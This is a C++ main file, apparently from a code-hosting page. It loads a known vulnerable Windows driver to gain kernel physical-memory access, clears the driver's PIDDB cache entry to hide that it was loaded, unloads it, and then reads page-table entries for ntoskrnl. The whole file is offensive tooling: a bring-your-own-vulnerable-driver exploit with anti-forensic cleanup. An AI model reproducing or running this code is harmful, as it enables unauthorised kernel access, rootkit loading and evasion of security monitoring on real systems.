You can not select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
43 lines
1.7 KiB
43 lines
1.7 KiB
#include <iostream>
|
|
#include "kernel_ctx/kernel_ctx.h"
|
|
#include "mem_ctx/mem_ctx.hpp"
|
|
|
|
int __cdecl main(int argc, char** argv)
|
|
{
|
|
if (!nasa::load_drv())
|
|
{
|
|
std::printf("[!] unable to load vulnerable driver... run as admin?\n");
|
|
return -1;
|
|
}
|
|
|
|
nasa::kernel_ctx kernel;
|
|
std::printf("[+] %s mapped physical page -> 0x%p\n", nasa::syscall_hook.first.data(), nasa::psyscall_func.load());
|
|
std::printf("[+] %s page offset -> 0x%x\n", nasa::syscall_hook.first.data(), nasa::nt_page_offset);
|
|
|
|
// clear piddb cache table entry for vulnerable driver...
|
|
if (kernel.clear_piddb_cache(nasa::drv_key, util::get_file_header((void*)raw_driver)->TimeDateStamp))
|
|
std::printf("[+] Removed PIDDB Cache entry for physmeme driver...\n");
|
|
else
|
|
std::printf("[!] unable to clear PIDDB Cache entry for vulnerable driver...\n");
|
|
|
|
if (!nasa::unload_drv())
|
|
{
|
|
std::printf("[!] unable to unload vulnerable driver... close all handles?\n");
|
|
return -1;
|
|
}
|
|
|
|
const std::pair<unsigned, virt_addr_t> my_proc_data = { GetCurrentProcessId(),
|
|
virt_addr_t{ reinterpret_cast<void*>(util::get_kernel_module_base("ntoskrnl.exe")) } };
|
|
|
|
std::cout << "[+] my pid: " << std::hex << my_proc_data.first << std::endl;
|
|
std::cout << "[+] kernel base: " << std::showbase << std::hex << my_proc_data.second.value << std::endl;
|
|
|
|
nasa::mem_ctx my_proc(kernel, my_proc_data.first);
|
|
const auto ntoskrnl_pde = my_proc.get_pde(my_proc_data.second.value);
|
|
|
|
// ntoskrnl is allocated in 2mb large pages :)
|
|
std::printf("[+] page present -> %d\n", ntoskrnl_pde.second.present);
|
|
std::printf("[+] page frame number -> 0x%x\n", ntoskrnl_pde.second.pfn);
|
|
std::printf("[+] large page -> %d\n", ntoskrnl_pde.second.page_size);
|
|
std::cin.get();
|
|
} |